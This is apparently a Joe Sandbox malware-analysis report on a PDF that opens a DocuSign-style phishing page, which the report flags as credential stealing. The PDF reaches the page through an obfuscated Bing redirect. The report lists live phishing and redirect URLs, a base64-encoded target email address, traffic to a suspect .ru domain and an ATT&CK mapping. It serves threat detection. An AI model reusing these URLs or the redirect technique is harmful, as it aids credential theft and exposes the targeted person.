Edit tour

Windows Analysis Report
xJwSq336bs.pdf

Overview

General Information

Sample name:	xJwSq336bs.pdf renamed because original name is a hash value
Original sample name:	53cf6e9968a5234c923f2826d5e9fa97c880c3fd.pdf
Analysis ID:	1467831
MD5:	3c860412604778442a97627e84abc63b
SHA1:	53cf6e9968a5234c923f2826d5e9fa97c880c3fd
SHA256:	bb6e4fa5ab06f4c632734a62f0009901a4b6b32b4c71de65aa644c19c5e729ca
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

AI detected suspicious PDF

HTML page contains hidden URLs or javascript code

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w10x64

Acrobat.exe (PID: 7136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\xJwSq336bs.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 3300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7288 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

chrome.exe (PID: 8164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

HTTP traffic detected: POST // HTTP/1.1Host: menlologistics.com.ruConnection: keep-aliveContent-Length: 17sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 19:06:01 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e163dc7a810f4d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 19:06:03 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e163edf89dc466-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 19:06:04 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 89e163f34d79c327-EWR

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.1.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chromecache_191.10.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/
Source: chromecache_191.10.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_194.10.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_191.10.dr	String found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
Source: chromecache_195.10.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_191.10.dr	String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRj9z_hgFkFomQz6SE0hZ3jtkWaAArgdoZ8OOuYjfT4XQ&s
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#about
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#classic-cars
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#contact
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#electric-vehicles
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#faq
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#learn-more
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#modern-supercars
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#privacy
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#services
Source: chromecache_191.10.dr	String found in binary or memory: https://menlologistics.com.ru/#terms
Source: chromecache_191.10.dr	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Source: chromecache_191.10.dr	String found in binary or memory: https://www.carlogos.org/uploads/2023/most-bought-super-cars-in-illinois-huracan.jpg
Source: chromecache_195.10.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: chromecache_191.10.dr	String found in binary or memory: https://www.experienceferrari.com/wp-content/uploads/2024/04/1968-Dodge-Charger-RT.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49772 version: TLS 1.2

Source: classification engine

Classification label: mal52.winPDF@41/56@12/8

Source: xJwSq336bs.pdf	Initial sample: https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1ahr0chm6ly9wdwitywq4ymriyjmymty5ndkznge5ytixogvlyjy4njg1ntkucjiuzgv2l2xpbmsuahrtbcm&bwfyawuty2xhdwrllmjlz2luqg9tahnozxjicm9va2uucwmuy2e=
Source: xJwSq336bs.pdf	Initial sample: https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-07-04 15-05-33-503.log

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\xJwSq336bs.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: xJwSq336bs.pdf	Initial sample: PDF keyword /JS count = 0
Source: xJwSq336bs.pdf	Initial sample: PDF keyword /JavaScript count = 0

Source: xJwSq336bs.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

AI detected suspicious PDF

Source: PDF shot

LLM: Score: 8 Reasons: The screenshot contains a visually prominent 'View Documents' button which is likely to attract user clicks. The text 'Please review and sign your document' creates a sense of urgency. The email appears to impersonate DocuSign, a well-known brand, which adds credibility to the phishing attempt. The combination of urgency and a prominent call-to-action button significantly increases the risk of phishing.

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Spearphishing Link	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering
https://cdn.jsdelivr.net/npm/bootstrap	0%	URL Reputation	safe
https://code.jquery.com/jquery-3.6.0.min.js	0%	URL Reputation	safe
https://menlologistics.com.ru/#classic-cars	0%	Avira URL Cloud	safe
https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#terms	0%	Avira URL Cloud	safe
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/favicon.ico	0%	Avira URL Cloud	safe
https://www.carlogos.org/uploads/2023/most-bought-super-cars-in-illinois-huracan.jpg	0%	Avira URL Cloud	safe
https://cdn.jsdelivr.net/npm/	0%	Avira URL Cloud	safe
https://code.jquery.com/jquery-3.5.1.slim.min.js	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#privacy	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#faq	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#services	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#about	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#modern-supercars	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#electric-vehicles	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#learn-more	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#	0%	Avira URL Cloud	safe
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/,	0%	Avira URL Cloud	safe
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html	0%	Avira URL Cloud	safe
https://menlologistics.com.ru//	0%	Avira URL Cloud	safe
https://www.cloudflare.com/favicon.ico	0%	Avira URL Cloud	safe
https://menlologistics.com.ru/#contact	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	0%	Avira URL Cloud	safe
https://developers.cloudflare.com/r2/data-access/public-buckets/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
code.jquery.com	151.101.66.137	true	false	unknown
menlologistics.com.ru	188.114.97.3	true	false	unknown
cdnjs.cloudflare.com	104.17.25.14	true	false	unknown
pub-ad8bdbb321694934a9a218eeb6868559.r2.dev	104.18.2.35	true	false	unknown
www.google.com	142.250.185.132	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://code.jquery.com/jquery-3.6.0.min.js	false	URL Reputation: safe	unknown
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=	true	SlashNext: Credential Stealing type: Phishing & Social Engineering	unknown
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/favicon.ico	false	Avira URL Cloud: safe	unknown
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/,	false	Avira URL Cloud: safe	unknown
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru//	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.jsdelivr.net/npm/	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/bootstrap	chromecache_191.10.dr	false	URL Reputation: safe	unknown
https://code.jquery.com/jquery-3.5.1.slim.min.js	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#privacy	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#terms	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#services	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://www.carlogos.org/uploads/2023/most-bought-super-cars-in-illinois-huracan.jpg	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#faq	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#classic-cars	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#about	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#modern-supercars	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#electric-vehicles	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#learn-more	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://menlologistics.com.ru/#contact	chromecache_191.10.dr	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/favicon.ico	chromecache_195.10.dr	false	Avira URL Cloud: safe	unknown
https://developers.cloudflare.com/r2/data-access/public-buckets/	chromecache_195.10.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.2.35	pub-ad8bdbb321694934a9a218eeb6868559.r2.dev	United States	13335	CLOUDFLARENETUS	false
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
23.47.168.24	unknown	United States	16625	AKAMAI-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	menlologistics.com.ru	European Union	13335	CLOUDFLARENETUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467831
Start date and time:	2024-07-04 21:04:39 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xJwSq336bs.pdf renamed because original name is a hash value
Original Sample Name:	53cf6e9968a5234c923f2826d5e9fa97c880c3fd.pdf
Detection:	MAL
Classification:	mal52.winPDF@41/56@12/8
Cookbook Comments:	Found application associated with file extension: .pdf Found PDF document Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.211.8.250, 52.6.155.20, 3.233.129.217, 3.219.243.226, 52.22.41.97, 2.19.11.121, 2.19.11.122, 162.159.61.3, 172.64.41.3, 23.55.161.211, 23.55.161.185, 93.184.221.240, 192.229.221.95, 2.22.242.11, 2.22.242.123, 142.250.181.227, 13.74.129.92, 216.58.212.174, 66.102.1.84, 34.104.35.123, 142.250.186.42, 142.250.181.234, 172.217.16.202, 142.250.186.106, 142.250.185.202, 142.250.185.74, 172.217.18.10, 142.250.185.170, 142.250.74.202, 142.250.184.202, 142.250.185.234, 172.217.16.138, 142.250.186.138, 216.58.206.42, 142.250.184.234, 142.250.186.170, 172.217.16.131, 216.58.212.142
